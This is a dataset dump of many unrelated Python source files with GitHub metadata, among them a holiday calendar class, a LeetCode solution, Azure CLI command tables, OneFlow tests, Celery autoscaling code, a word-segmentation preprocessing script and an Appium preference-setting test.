] | permissive | BarracudaPff/code-golf-data-python | fb0cfc74d1777c4246d56a5db8525432bf37ab1a | 42e8858c2ebc6a061012bcadb167d29cebb85c5e | refs/heads/main | 2023-05-29T05:52:22.856551 | 2020-05-23T22:12:48 | 2020-05-23T22:12:48 | 378,832,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | from __future__ import absolute_import, division, print_function, unicode_literals
from ..registry_tools import iso_register
from .core import UnitedStates
@iso_register("US-NJ")
class NewJersey(UnitedStates):
"""New Jersey"""
include_good_friday = True
include_election_day_every_year = True | [
"[email protected]"
] | |
85680cb8d5a23c4dd6047fa67e2115f85b2e1ca1 | ca17bd80ac1d02c711423ac4093330172002a513 | /find_leaves/FindLeaves.py | abce20d217199c2a3c79ac375c09f9dd3dcd5f44 | [] | no_license | Omega094/lc_practice | 64046dea8bbdaee99d767b70002a2b5b56313112 | e61776bcfd5d93c663b247d71e00f1b298683714 | refs/heads/master | 2020-03-12T13:45:13.988645 | 2018-04-23T06:28:32 | 2018-04-23T06:28:32 | 130,649,699 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,461 | py | import sys
sys.path.append("/Users/jinzhao/leetcode/")
from leetcode.common import *
class Solution(object):
def isLeaf(self, root):
if root:
return not root.left and not root.right
return False
def deleteLeaf(self, root, solution):
if root:
if root.left:
if self.isLeaf(root.left):
solution.append(root.left.val)
root.left = None
else:
self.deleteLeaf(root.left, solution)
if root.right:
if self.isLeaf(root.right):
solution.append(root.right.val)
root.right = None
else:
self.deleteLeaf(root.right, solution)
return solution
def findLeaves(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
parent = TreeNode(0)
parent.right = root
solutionList = []
while parent.right:
#The line below could be removed for submission.
pretty_print_tree(parent.right, [])
solution = self.deleteLeaf(parent,[] )
if solution :
solutionList.append(solution)
return solutionList
if __name__ == "__main__":
sol = Solution()
root = build_tree_by_level([1,2,3,4,5,6,7])
#pretty_print_tree(root, [])
print sol.findLeaves(root)
| [
"[email protected]"
] | |
52f0bbbdbef2c865ea39664ab4a748fe1eddfdcd | 325fde42058b2b82f8a4020048ff910cfdf737d7 | /src/quantum/azext_quantum/commands.py | 8dba4d309945625ee9a7487899150bcbc8cc9495 | [
"LicenseRef-scancode-generic-cla",
"MIT"
] | permissive | ebencarek/azure-cli-extensions | 46b0d18fe536fe5884b00d7ffa30f54c7d6887d1 | 42491b284e38f8853712a5af01836f83b04a1aa8 | refs/heads/master | 2023-04-12T00:28:44.828652 | 2021-03-30T22:34:13 | 2021-03-30T22:34:13 | 261,621,934 | 2 | 5 | MIT | 2020-10-09T18:21:52 | 2020-05-06T01:25:58 | Python | UTF-8 | Python | false | false | 5,417 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
from collections import OrderedDict
from azure.cli.core.commands import CliCommandType
from ._validators import validate_workspace_info, validate_target_info, validate_workspace_and_target_info, validate_workspace_info_no_location, validate_provider_and_sku_info
def transform_targets(providers):
def one(provider, target):
return OrderedDict([
('Provider', provider),
('Target-id', target['id']),
('Current Availability', target['currentAvailability']),
('Average Queue Time (seconds)', target['averageQueueTime'])
])
return [
one(provider['id'], target)
for provider in providers
for target in provider['targets']
]
def transform_job(result):
result = OrderedDict([
('Name', result['name']),
('Id', result['id']),
('Status', result['status']),
('Target', result['target']),
('Submission time', result['creationTime']),
('Completion time', result['endExecutionTime'])
])
return result
def transform_jobs(results):
def creation(job):
return job['creationTime']
return [transform_job(job) for job in sorted(results, key=creation, reverse=True)]
def transform_offerings(offerings):
def one(offering):
return OrderedDict([
('Provider Id', offering['id']),
('SKUs', ', '.join([s['id'] for s in offering['properties']['skus']])),
('Publisher ID', offering['properties']['managedApplication']['publisherId']),
('Offer ID', offering['properties']['managedApplication']['offerId'])
])
return [one(offering) for offering in offerings]
def transform_output(results):
def one(key, value):
repeat = round(20 * value)
barra = "\u2588" * repeat
return OrderedDict([
('Result', key),
('Frequency', f"{value:10.8f}"),
('', f"\u2590{barra:<22} |"),
])
if 'Histogram' in results:
histogram = results['Histogram']
# The Histogram serialization is odd entries are key and even entries values
# Make sure we have even entries
if (len(histogram) % 2) == 0:
table = []
items = range(0, len(histogram), 2)
for i in items:
key = histogram[i]
value = histogram[i + 1]
table.append(one(key, value))
return table
elif 'histogram' in results:
histogram = results['histogram']
return [one(key, histogram[key]) for key in histogram]
return results
def load_command_table(self, _):
workspace_ops = CliCommandType(operations_tmpl='azext_quantum.operations.workspace#{}')
job_ops = CliCommandType(operations_tmpl='azext_quantum.operations.job#{}')
target_ops = CliCommandType(operations_tmpl='azext_quantum.operations.target#{}')
offerings_ops = CliCommandType(operations_tmpl='azext_quantum.operations.offerings#{}')
with self.command_group('quantum workspace', workspace_ops) as w:
w.command('create', 'create')
w.command('delete', 'delete', validator=validate_workspace_info_no_location)
w.command('list', 'list')
w.show_command('show', validator=validate_workspace_info_no_location)
w.command('set', 'set', validator=validate_workspace_info)
w.command('clear', 'clear')
w.command('quotas', 'quotas', validator=validate_workspace_info)
with self.command_group('quantum target', target_ops) as t:
t.command('list', 'list', validator=validate_workspace_info, table_transformer=transform_targets)
t.show_command('show', validator=validate_target_info)
t.command('set', 'set', validator=validate_target_info)
t.command('clear', 'clear')
with self.command_group('quantum job', job_ops) as j:
j.command('list', 'list', validator=validate_workspace_info, table_transformer=transform_jobs)
j.show_command('show', validator=validate_workspace_info, table_transformer=transform_job)
j.command('submit', 'submit', validator=validate_workspace_and_target_info, table_transformer=transform_job)
j.command('wait', 'wait', validator=validate_workspace_info, table_transformer=transform_job)
j.command('output', 'output', validator=validate_workspace_info, table_transformer=transform_output)
with self.command_group('quantum', job_ops, is_preview=True) as q:
q.command('run', 'run', validator=validate_workspace_and_target_info, table_transformer=transform_output)
q.command('execute', 'run', validator=validate_workspace_and_target_info, table_transformer=transform_output)
with self.command_group('quantum offerings', offerings_ops) as o:
o.command('list', 'list_offerings', table_transformer=transform_offerings)
o.command('accept-terms', 'accept_terms', validator=validate_provider_and_sku_info)
o.command('show-terms', 'show_terms', validator=validate_provider_and_sku_info)
| [
"[email protected]"
] | |
a4abde74b1d48317424e2021da5db8a2da70ee28 | 14e36010b98895e08bd9edfcbc60dce30cbfb82b | /oneflow/python/test/modules/test_argmax.py | 2f6e97661d6adf0677afe950e239b03a88c32db5 | [
"Apache-2.0"
] | permissive | duzhanyuan/oneflow | a9719befbfe112a7e2dd0361ccbd6d71012958fb | c6b47a3e4c9b5f97f5bc9f60bc1401313adc32c5 | refs/heads/master | 2023-06-21T20:31:55.828179 | 2021-07-20T16:10:02 | 2021-07-20T16:10:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,326 | py | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
from collections import OrderedDict
import numpy as np
import oneflow.experimental as flow
from test_util import GenArgList
def _test_argmax_aixs_negative(test_case, device):
input = flow.Tensor(
np.random.randn(2, 6, 5, 3), dtype=flow.float32, device=flow.device(device),
)
axis = -1
of_out = flow.argmax(input, dim=axis)
np_out = np.argmax(input.numpy(), axis=axis)
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
def _test_tensor_argmax(test_case, device):
input = flow.Tensor(
np.random.randn(2, 6, 5, 3), dtype=flow.float32, device=flow.device(device),
)
axis = 0
of_out = input.argmax(dim=axis)
np_out = np.argmax(input.numpy(), axis=axis)
test_case.assertTrue(np.array_equal(of_out.numpy().shape, np_out.shape))
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
def _test_argmax_axis_postive(test_case, device):
input = flow.Tensor(
np.random.randn(2, 6, 5, 3), dtype=flow.float32, device=flow.device(device),
)
axis = 1
of_out = flow.argmax(input, dim=axis)
np_out = np.argmax(input.numpy(), axis=axis)
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
def _test_argmax_keepdims(test_case, device):
input = flow.Tensor(
np.random.randn(2, 6, 5, 3), dtype=flow.float32, device=flow.device(device),
)
axis = 0
of_out = input.argmax(axis, True)
np_out = np.argmax(input.numpy(), axis=axis)
np_out = np.expand_dims(np_out, axis=axis)
test_case.assertTrue(np.array_equal(of_out.numpy().shape, np_out.shape))
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
def _test_argmax_dim_equal_none(test_case, device):
input = flow.Tensor(
np.random.randn(2, 6, 5, 3), dtype=flow.float32, device=flow.device(device),
)
of_out = input.argmax()
np_out = np.argmax(input.numpy().flatten(), axis=0)
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
@flow.unittest.skip_unless_1n1d()
class TestArgmax(flow.unittest.TestCase):
def test_argmax(test_case):
arg_dict = OrderedDict()
arg_dict["test_fun"] = [
_test_argmax_aixs_negative,
_test_tensor_argmax,
_test_argmax_axis_postive,
_test_argmax_keepdims,
_test_argmax_dim_equal_none,
]
arg_dict["device"] = ["cpu", "cuda"]
for arg in GenArgList(arg_dict):
arg[0](test_case, *arg[1:])
if __name__ == "__main__":
unittest.main()
| [
"[email protected]"
] | |
aebfc07c7c0647c4cf50ffd3727a29c3a1a1bbf5 | 8dbb2a3e2286c97b1baa3ee54210189f8470eb4d | /kubernetes-stubs/client/models/v1_portworx_volume_source.pyi | b25062ce2dce6c1b5d1c6d991321863933c2432c | [] | no_license | foodpairing/kubernetes-stubs | e4b0f687254316e6f2954bacaa69ff898a88bde4 | f510dc3d350ec998787f543a280dd619449b5445 | refs/heads/master | 2023-08-21T21:00:54.485923 | 2021-08-25T03:53:07 | 2021-08-25T04:45:17 | 414,555,568 | 0 | 0 | null | 2021-10-07T10:26:08 | 2021-10-07T10:26:08 | null | UTF-8 | Python | false | false | 565 | pyi | import datetime
import typing
import kubernetes.client
class V1PortworxVolumeSource:
fs_type: typing.Optional[str]
read_only: typing.Optional[bool]
volume_id: str
def __init__(
self,
*,
fs_type: typing.Optional[str] = ...,
read_only: typing.Optional[bool] = ...,
volume_id: str
) -> None: ...
def to_dict(self) -> V1PortworxVolumeSourceDict: ...
class V1PortworxVolumeSourceDict(typing.TypedDict, total=False):
fsType: typing.Optional[str]
readOnly: typing.Optional[bool]
volumeID: str
| [
"[email protected]"
] | |
949ad3a1372e9c39832994758556504087695f10 | 2fd0c65aa0f72133f773dac5d9a5c48fe9e26fac | /Dsz/PyScripts/Lib/dsz/mca/survey/cmd/registryquery/__init__.py | 83cc81184494f05024215cd8ec32607526a0ff9d | [] | no_license | FingerLeakers/DanderSpritz_docs | f5d2430e0b86b1b2f0684f02ddd4fa973a5a7364 | d96b6a71c039b329f9f81544f645857c75360e7f | refs/heads/master | 2021-01-25T13:05:51.732149 | 2018-03-08T01:22:49 | 2018-03-08T01:22:49 | 123,527,268 | 2 | 0 | null | 2018-03-02T03:48:31 | 2018-03-02T03:48:30 | null | UTF-8 | Python | false | false | 362 | py | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.10 (default, Feb 6 2017, 23:53:20)
# [GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.34)]
# Embedded file name: __init__.py
from errors import *
from types import *
from type_Params import *
from type_KeyInfo import *
from type_Subkey import *
from type_Value import * | [
"[email protected]"
] | |
1e749a5b71a5aaeafceab5a016ab8fc7637dfd16 | 8d5c9369b0fb398c5a6078f6cac43ba8d67202fa | /bscan.spec | 279792b27d524a1ad2c5efe84281796470e6b245 | [
"MIT"
] | permissive | raystyle/bscan | 45191c2c0d26fe450c5d95567b83d47dfcb4c692 | 1edf0c0e738153a294d5cdc1b69d8f167152d5a2 | refs/heads/master | 2020-04-25T03:15:37.186913 | 2019-02-09T22:23:44 | 2019-02-09T22:23:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 724 | spec | # -*- mode: python -*-
block_cipher = None
added_files = [
('bscan/configuration/', 'configuration',),
]
a = Analysis(
['bscan/__main__.py'],
binaries=[],
datas=added_files,
hiddenimports=[],
hookspath=[],
runtime_hooks=[],
excludes=[],
win_no_prefer_redirects=False,
win_private_assemblies=False,
cipher=block_cipher,
noarchive=False
)
pyz = PYZ(
a.pure,
a.zipped_data,
cipher=block_cipher
)
exe = EXE(
pyz,
a.scripts,
a.binaries,
a.zipfiles,
a.datas,
[],
name='bscan',
debug=False,
bootloader_ignore_signals=False,
strip=False,
upx=True,
runtime_tmpdir=None,
console=True,
icon='static/app.ico'
)
| [
"[email protected]"
] | |
56537f73c96e020a0161b300e33f26b648a28147 | 943dca755b940493a8452223cfe5daa2fb4908eb | /abc161/c.py | 58a67245e18e4e88e54cf22d9cc45d994a59cc51 | [] | no_license | ymsk-sky/atcoder | 5e34556582763b7095a5f3a7bae18cbe5b2696b2 | 36d7841b70b521bee853cdd6d670f8e283d83e8d | refs/heads/master | 2023-08-20T01:34:16.323870 | 2023-08-13T04:49:12 | 2023-08-13T04:49:12 | 254,348,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | n,k=map(int,input().split())
if n<k: print(min(n,abs(n-k)))
elif n==k or k==1: print(0)
else: print(min(n,abs(n-(n//k+1)*k)))
| [
"[email protected]"
] | |
e16d5a370589fd4fcb8ab0377701d48a1d1d0853 | e21c70d5b03633b4e0a89dfccb0cb8ccd88612d0 | /venv/lib/python3.5/site-packages/celery/worker/autoscale.py | e21f73a0b61f250f23f6950d29d8adb767250aa1 | [
"MIT"
] | permissive | LavanyaRamkumar/Networking-app_Dynamic-Quiz | 4d5540088b1e2724626dda8df0fd83442391b40f | 4de8329845712864d3cc8e8b81cfce5a1207224d | refs/heads/master | 2023-02-09T12:08:19.913354 | 2019-10-26T04:23:54 | 2019-10-26T04:23:54 | 173,337,916 | 1 | 1 | MIT | 2023-02-02T04:48:55 | 2019-03-01T16:56:13 | Python | UTF-8 | Python | false | false | 4,883 | py | # -*- coding: utf-8 -*-
"""Pool Autoscaling.
This module implements the internal thread responsible
for growing and shrinking the pool according to the
current autoscale settings.
The autoscale thread is only enabled if
the :option:`celery worker --autoscale` option is used.
"""
from __future__ import absolute_import, unicode_literals
import os
import threading
from time import sleep
from kombu.async.semaphore import DummyLock
from celery import bootsteps
from celery.five import monotonic
from celery.utils.log import get_logger
from celery.utils.threads import bgThread
from . import state
from .components import Pool
__all__ = ['Autoscaler', 'WorkerComponent']
logger = get_logger(__name__)
debug, info, error = logger.debug, logger.info, logger.error
AUTOSCALE_KEEPALIVE = float(os.environ.get('AUTOSCALE_KEEPALIVE', 30))
class WorkerComponent(bootsteps.StartStopStep):
"""Bootstep that starts the autoscaler thread/timer in the worker."""
label = 'Autoscaler'
conditional = True
requires = (Pool,)
def __init__(self, w, **kwargs):
self.enabled = w.autoscale
w.autoscaler = None
def create(self, w):
scaler = w.autoscaler = self.instantiate(
w.autoscaler_cls,
w.pool, w.max_concurrency, w.min_concurrency,
worker=w, mutex=DummyLock() if w.use_eventloop else None,
)
return scaler if not w.use_eventloop else None
def register_with_event_loop(self, w, hub):
w.consumer.on_task_message.add(w.autoscaler.maybe_scale)
hub.call_repeatedly(
w.autoscaler.keepalive, w.autoscaler.maybe_scale,
)
class Autoscaler(bgThread):
"""Background thread to autoscale pool workers."""
def __init__(self, pool, max_concurrency,
min_concurrency=0, worker=None,
keepalive=AUTOSCALE_KEEPALIVE, mutex=None):
super(Autoscaler, self).__init__()
self.pool = pool
self.mutex = mutex or threading.Lock()
self.max_concurrency = max_concurrency
self.min_concurrency = min_concurrency
self.keepalive = keepalive
self._last_scale_up = None
self.worker = worker
assert self.keepalive, 'cannot scale down too fast.'
def body(self):
with self.mutex:
self.maybe_scale()
sleep(1.0)
def _maybe_scale(self, req=None):
procs = self.processes
cur = min(self.qty, self.max_concurrency)
if cur > procs:
self.scale_up(cur - procs)
return True
cur = max(self.qty, self.min_concurrency)
if cur < procs:
self.scale_down(procs - cur)
return True
def maybe_scale(self, req=None):
if self._maybe_scale(req):
self.pool.maintain_pool()
def update(self, max=None, min=None):
with self.mutex:
if max is not None:
if max < self.processes:
self._shrink(self.processes - max)
self.max_concurrency = max
if min is not None:
if min > self.processes:
self._grow(min - self.processes)
self.min_concurrency = min
return self.max_concurrency, self.min_concurrency
def force_scale_up(self, n):
with self.mutex:
new = self.processes + n
if new > self.max_concurrency:
self.max_concurrency = new
self._grow(n)
def force_scale_down(self, n):
with self.mutex:
new = self.processes - n
if new < self.min_concurrency:
self.min_concurrency = max(new, 0)
self._shrink(min(n, self.processes))
def scale_up(self, n):
self._last_scale_up = monotonic()
return self._grow(n)
def scale_down(self, n):
if self._last_scale_up and (
monotonic() - self._last_scale_up > self.keepalive):
return self._shrink(n)
def _grow(self, n):
info('Scaling up %s processes.', n)
self.pool.grow(n)
self.worker.consumer._update_prefetch_count(n)
def _shrink(self, n):
info('Scaling down %s processes.', n)
try:
self.pool.shrink(n)
except ValueError:
debug("Autoscaler won't scale down: all processes busy.")
except Exception as exc:
error('Autoscaler: scale_down: %r', exc, exc_info=True)
self.worker.consumer._update_prefetch_count(-n)
def info(self):
return {
'max': self.max_concurrency,
'min': self.min_concurrency,
'current': self.processes,
'qty': self.qty,
}
@property
def qty(self):
return len(state.reserved_requests)
@property
def processes(self):
return self.pool.num_processes
| [
"[email protected]"
] | |
466965dcbb3fd44bda5de7f81e42d31ae7e715c4 | c5a360ae82b747307b94720e79e2e614d0c9f70f | /step2_process_data_format_by_keras.py | 818e00fc1f1b23a04f91efd4f4c676aa8a55aca4 | [] | no_license | gswyhq/chinese_wordseg_keras | cf99156773d4555acddf3163457f9bc224a16477 | 7f1de5fb1e3372fac9df75d3d839aa92fa4601c9 | refs/heads/master | 2020-05-02T13:49:32.099129 | 2019-03-28T14:07:46 | 2019-03-28T14:11:49 | 177,993,542 | 0 | 0 | null | 2019-03-27T12:49:37 | 2019-03-27T12:49:37 | null | UTF-8 | Python | false | false | 4,090 | py | #!/usr/bin/python3
# coding=utf-8
# ### 基于深度学习的中文分词尝试
# - 基于word2vec + 神经网络进行中文分词
# - 步骤1:使用的是sogou的语料库建立初始的字向量。
# - 步骤2:读入有标注的训练语料库,处理成keras需要的数据格式。
# - 步骤3:根据训练数据建模,使用CNN方法
# - 步骤4:读入无标注的检验语料库,用CNN模型进行分词标注
# - 步骤5:检查最终的效果
# - 参考资料:[中文分词资源](http://www.52nlp.cn/%E4%B8%AD%E6%96%87%E5%88%86%E8%AF%8D%E5%85%A5%E9%97%A8%E4%B9%8B%E8%B5%84%E6%BA%90)
# [中文分词标注法](http://www.52nlp.cn/the-character-based-tagging-method-of-chinese-word-segmentation) [word2vec原理](http://suanfazu.com/t/word2vec-zhong-de-shu-xue-yuan-li-xiang-jie-duo-tu-wifixia-yue-du/178) [基于word2vec的中文分词](http://blog.csdn.net/itplus/article/details/17122431)
# - 步骤1:先用sogou语料库生成中文的单字向量,以备后用
import codecs
import numpy as np
from pickle import dump,load
# - 步骤2:训练数据读取和转换
init_weight_wv= load(open('init_weight.pickle','rb'))
word2idx = load(open('word2idx.pickle', 'rb'))
idx2word = load(open('idx2word.pickle', 'rb'))
# 读取数据,将格式进行转换为带四种标签 S B M E
input_file = './data/icwb2-data/training/msr_training.utf8'
output_file = './data/icwb2-data/training/msr_training.tagging.utf8'
# 用于字符标记的4个标签:B(开始),E(结束),M(中),S(单)
def character_tagging(input_file, output_file):
input_data = codecs.open(input_file, 'r', 'utf-8')
output_data = codecs.open(output_file, 'w', 'utf-8')
for line in input_data.readlines():
word_list = line.strip().split()
for word in word_list:
if len(word) == 1:
output_data.write(word + "/S ")
else:
output_data.write(word[0] + "/B ")
for w in word[1:len(word)-1]:
output_data.write(w + "/M ")
output_data.write(word[len(word)-1] + "/E ")
output_data.write("\n")
input_data.close()
output_data.close()
character_tagging(input_file, output_file)
# 定义'U'为未登陆新字, 空格为两头padding用途,并增加两个相应的向量表示
char_num = len(init_weight_wv)
idx2word[char_num] = u'U'
word2idx[u'U'] = char_num
idx2word[char_num+1] = u' '
word2idx[u' '] = char_num+1
init_weight_wv.append(np.random.randn(100,))
init_weight_wv.append(np.zeros(100,))
# In[21]:
# 分离word 和 label
with open(output_file) as f:
lines = f.readlines()
train_line = [[w[0] for w in line.split()] for line in lines]
train_label = [w[2] for line in lines for w in line.split()]
# In[17]:
# 文档转数字list
def sent2num(sentence, word2idx = word2idx, context = 7):
predict_word_num = []
for w in sentence:
# 文本中的字如果在词典中则转为数字,如果不在则设置为'U
if w in word2idx:
predict_word_num.append(word2idx[w])
else:
predict_word_num.append(word2idx[u'U'])
# 首尾padding
num = len(predict_word_num)
pad = int((context-1)*0.5)
for i in range(pad):
predict_word_num.insert(0,word2idx[u' '] )
predict_word_num.append(word2idx[u' '] )
train_x = []
for i in range(num):
train_x.append(predict_word_num[i:i+context])
return train_x
# In[53]:
# 输入字符list,输出数字list
sent2num(train_line[0])
# In[60]:
# 将所有训练文本转成数字list
train_word_num = []
for line in train_line:
train_word_num.extend(sent2num(line))
# In[62]:
print(len(train_word_num))
print(len(train_label))
# In[64]:
dump(train_word_num, open('train_word_num.pickle', 'wb'))
#train_word_num = load(open('train_word_num.pickle','rb'))
dump(train_label, open('train_label.pickle', 'wb'))
dump(sent2num, open('sent2num.pickle', 'wb'))
# In[22]:
def main():
pass
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
d1ce2f47b5065975e22b593396c700d64efe1e9f | 8a3e2d3aa46224bb0fa8ff2351f3a0bb339b0abd | /my_site/campaign/forms.py | 3f7e74dbce84eaa30d8118c3816d03edc36af25e | [] | no_license | Mosaab4/Task | 85ceeab56b3ffe57049d3474c97964d51ace3471 | 4d0d250c06e97a74ce723e91addc9c17faef5b4e | refs/heads/master | 2020-03-23T15:33:53.417503 | 2018-07-20T21:37:14 | 2018-07-20T21:37:14 | 141,757,012 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 512 | py | from django import forms
from django.forms import SelectDateWidget
from .models import Campaign
class CampaignForm(forms.ModelForm):
stop_date = forms.DateField(
widget=forms.DateInput(
attrs={
'type': 'date',
'class': 'form-control'
}
)
)
class Meta:
model = Campaign
fields = (
'name',
'status',
'type',
'stop_date',
'description',
) | [
"[email protected]"
] | |
b8f92479cf86e0f5872b64f2bc3d32b9b1e0f0a4 | 32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd | /benchmark/radiocell/testcase/allpreferencecases/precase_log.py | 5de436ca260389960142a69aa2c35fe93a6bb02c | [] | no_license | Prefest2018/Prefest | c374d0441d714fb90fca40226fe2875b41cf37fc | ac236987512889e822ea6686c5d2e5b66b295648 | refs/heads/master | 2021-12-09T19:36:24.554864 | 2021-12-06T12:46:14 | 2021-12-06T12:46:14 | 173,225,161 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,780 | py | #coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'org.openbmap',
'appActivity' : 'org.openbmap.activities.StartscreenActivity',
'resetKeyboard' : True,
'androidCoverage' : 'org.openbmap/org.openbmap.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
time.sleep(timeout)
p.terminate()
return
def getElememt(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2) :
for i in range(0, 2, 1):
try:
element = driver.find_element_by_android_uiautomator(str1)
except NoSuchElementException:
time.sleep(1)
else:
return element
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str2)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str2)
return element
def swipe(driver, startxper, startyper, endxper, endyper) :
size = driver.get_window_size()
width = size["width"]
height = size["height"]
try:
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=1000)
except WebDriverException:
time.sleep(1)
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=1000)
return
def scrollToFindElement(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
elements = driver.find_elements_by_android_uiautomator(str)
if (len(elements) > 1) :
for temp in elements :
if temp.get_attribute("enabled") == "true" :
element = temp
break
except NoSuchElementException:
swipe(driver, 0.5, 0.55, 0.5, 0.2)
else :
return element
for i in range(0, 4, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
elements = driver.find_elements_by_android_uiautomator(str)
if (len(elements) > 1):
for temp in elements:
if temp.get_attribute("enabled") == "true":
element = temp
break
except NoSuchElementException:
swipe(driver, 0.5, 0.2, 0.5, 0.55)
else :
return element
return
def scrollToClickElement(driver, str) :
element = scrollToFindElement(driver, str)
if element is None :
return
else :
element.click()
def clickInList(driver, str) :
element = None
if (str is None) :
candidates = driver.find_elements_by_class_name("android.widget.CheckedTextView")
if len(candidates) >= 1 and checkWindow(driver):
element = candidates[len(candidates)-1]
else :
element = scrollToFindElement(driver, str)
if element is not None :
element.click()
else :
if checkWindow(driver) :
driver.press_keycode(4)
def clickOnCheckable(driver, str, value = "true") :
parents = driver.find_elements_by_class_name("android.widget.LinearLayout")
for parent in parents:
try :
parent.find_element_by_android_uiautomator(str)
lists = parent.find_elements_by_class_name("android.widget.LinearLayout")
if len(lists) == 1 :
innere = parent.find_element_by_android_uiautomator("new UiSelector().checkable(true)")
nowvalue = innere.get_attribute("checked")
if (nowvalue != value) :
innere.click()
break
except NoSuchElementException:
continue
def typeText(driver, value) :
element = getElememt(driver, "new UiSelector().className(\"android.widget.EditText\")")
element.clear()
element.send_keys(value)
enterelement = getElememt(driver, "new UiSelector().text(\"OK\")")
if (enterelement is None) :
if checkWindow(driver):
driver.press_keycode(4)
else :
enterelement.click()
def checkWindow(driver) :
dsize = driver.get_window_size()
nsize = driver.find_element_by_class_name("android.widget.FrameLayout").size
if dsize['height'] > nsize['height']:
return True
else :
return False
def conscript(driver):
try:
driver.find_element_by_android_uiautomator("new UiSelector().text(\"OK\")").click()
time.sleep(0.1)
except NoSuchElementException:
time.sleep(0.1)
return
# preference setting and exit
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
os.popen("adb shell am start -n org.openbmap/org.openbmap.activities.AdvancedSettingsActivity -a test")
scrollToClickElement(driver, "new UiSelector().text(\"Ignore low battery\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Ignore low battery\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"Cleanup old sessions\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Cleanup old sessions\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"On export, create a GPX file locally on your device\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"On export, create a GPX file locally on your device\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"GPX verbosity\")")
clickInList(driver, "new UiSelector().text(\"Waypoints only\")")
conscript(driver)
scrollToClickElement(driver, "new UiSelector().text(\"Wireless scan mode\")")
clickInList(driver, "new UiSelector().text(\"Full power mode\")")
conscript(driver)
scrollToClickElement(driver, "new UiSelector().text(\"Anonymise SSID in upload files\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Anonymise SSID in upload files\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"Skip upload\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Skip upload\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"Keep uploaded files\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Keep uploaded files\")", "true")
driver.press_keycode(4)
time.sleep(2)
os.popen("adb shell am start -n org.openbmap/org.openbmap.activities.SettingsActivity -a test")
scrollToClickElement(driver, "new UiSelector().text(\"Anonymous upload\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Anonymous upload\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"Save Cells\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Save Cells\")", "false")
scrollToClickElement(driver, "new UiSelector().text(\"Save WiFis\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Save WiFis\")", "false")
scrollToClickElement(driver, "new UiSelector().text(\"Keep screen on\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Keep screen on\")", "false")
driver.press_keycode(4)
time.sleep(2)
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"preference_pre\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
| [
